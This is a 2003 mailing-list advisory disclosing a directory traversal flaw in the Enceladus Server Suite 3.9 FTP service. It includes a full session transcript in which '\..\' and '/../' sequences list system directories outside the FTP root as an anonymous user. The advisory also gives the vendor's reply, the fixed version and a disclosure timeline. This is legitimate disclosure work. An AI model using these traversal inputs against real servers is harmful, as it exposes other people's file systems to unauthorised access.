[VulnWatch] Directory Traversal vulnerability found in Enceladus Server Suite version 3.9

From: matrix@infowarfare.dk
Date: 01/21/03

  • Next message: Rain Forest Puppy: "[VulnWatch] Multiple MySQL bugs"
    Date: Tue, 21 Jan 2003 21:06:07 +0100
    From: matrix@infowarfare.dk
    To: undisclosed-recipients:;
    

                     Directory Traversal vulnerability found in
                          Enceladus Server Suite version 3.9
                                   (FTP Service)
                                                             
                             Discovered by Dennis Rand
                                www.Infowarfare.dk
    ------------------------------------------------------------------------

    SUMMARY
    Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server
    for
    Windows, provides secure file sharing on any network! Perfect for Broadband,
    Cable Modem, Small business and Personal Use. You don't have to be an expert
    to
    setup file sharing or run your own web site and FTP Server!! This Server Suite
    is
    One of the Easiest To Install and Operate!

    A directory traversal vulnerability in the product allows remote attackers to
    cause
    the server to traverse into directories that reside outside the bounding
    FTP root directory. The default installation include a anonymous user where
    this can be
    used.

    DETAILS

    Vulnerable systems:
     Windows NT 4.0 and Windows 2000 server fully patched
     * Enceladus Server Suite version 3.9
     
    Immune systems:
     * Enceladus Web and FTP Server Suite V3.9.11

    Enceladus Server Suite version 3.9 failure to filter out "\.." and "/.."
    sequences in specific command requests
    allowing a remote users to break out of restricted directories and gain read
    access
    to the system directory structure; Possibility for discovering the directory
    structure outside the configured areas.

    The following transcript demonstrates a sample exploitation of the
    vulnerabilities:

    Connected to 192.168.1.199.
    220 Mollensoft FTP Server Ready.
    User (192.168.1.199:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    index.html
    readme.txt
    226 Listing complete.
    ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec.
    ftp> cd ..
    550 Access denied
    ftp> cd ...
    550 Access denied
    ftp> cd \..\
    550 Access denied
    ftp> cd/../
    Invalid command.
    ftp> cd /../
    550 Access denied
    ftp> ls /../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> ls /../../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> ls \..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> dir \..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 backup-html
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 cgi-bin
    drwxr-xr-x 1 User Group 0 Jan 19 10:46 config
    -rwxr-xr-x 1 User Group 1016037 Mar 21 00:34 ENCELADUSHELP.CHM
    -rwxr-xr-x 1 User Group 241664 Nov 24 23:57 EnceladusServer3.9.exe
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 html
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 logs
    -rwxr-xr-x 1 User Group 30880 Jan 19 10:45 UNINSTAL.DAT
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 users
    226 Listing complete.
    ftp: 619 bytes received in 0,00Seconds 619000,00Kbytes/sec.
    ftp> dir \..\..\..\..\..\..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus
    -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32
    EnceladusServerSuiteDemoV3.1.EXE
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
    til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys
    drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP
    drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT
    226 Listing complete.
    ftp: 1340 bytes received in 0,13Seconds 10,31Kbytes/sec.
    ftp> dir /../../../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus
    -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32
    EnceladusServerSuiteDemoV3.1.EXE
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
    til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys
    drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP
    drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT
    226 Listing complete.
    ftp: 1340 bytes received in 0,14Seconds 9,57Kbytes/sec.
    ftp> bye
    221 Goodbye.

    Detection:
    Enceladus Server Suite version 3.9 is vulnerable to the above-described
    attacks.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    Good thing you cant "put" or "get" any files... Thanks for the heads up, I
    thought I had fixed the directory listing,. Not too much harm in getting a
    directory listing (still needs to be fixed).

    Support
    Enceladus Web and FTP Server Suite V3.9.11
    The latest version is available from http://www.mollensoft.com/product3.htm

    Disclosure timeline:
    19/01/2003 Found the Vulnerability.
    19/01/2003 Author notified. Send mail to support@mollensoft.com
    21/01/2003 Responses received from MollenSoft
    21/01/2003 Public Disclosure.

    ADDITIONAL INFORMATION
    The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect,
    incidental, consequential, loss of business profits or special damages.

    -------------------------------------------------
    This mail sent through IMP: http://horde.org/imp/



    Relevant Pages